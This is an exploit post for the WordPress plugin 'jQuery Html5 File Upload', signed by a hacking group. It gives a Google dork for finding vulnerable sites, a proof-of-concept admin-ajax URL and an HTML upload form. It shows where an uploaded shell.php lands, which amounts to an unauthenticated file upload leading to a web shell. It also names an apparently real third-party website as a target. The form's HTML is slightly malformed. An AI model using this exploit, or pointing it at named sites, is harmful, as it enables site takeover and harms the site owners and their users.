########################## # Exploit Title: Wordpress Plugins jQuery Html5 File Upload # Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/ # We Are Iranian Anonymous Iranonymous.org # Discovered By: Hacker Khan ################ # Vendor Homepage: https://wordpress.org/plugins/jquery-html5-file-upload/ # Software Link: https://downloads.wordpress.org/plugin/jquery-html5-file-upload.3.0.zip # Version: Any Version # Tested on: Windows, Linux ############################# Poc : targe.com/wp-admin/admin-ajax.php?action=load_ajax_function ############################ Exploit HTML : <center> <br><br><br><br><br><br><br><br><br><br><br><br><br> <font face="Iceland" color="red" size="7">jQuery File Upload By Hacker Khan</font><br> <form method="POST" action="target.com/ enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> ########################### Shell Access : http://www.target.com/wp-content/uploads/files/guest/shell.php ########################### Target : http://students4students.us/wp-admin/admin-ajax.php?action=load_ajax_function ############################# #Thanks to : MR.Khatar |||| ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous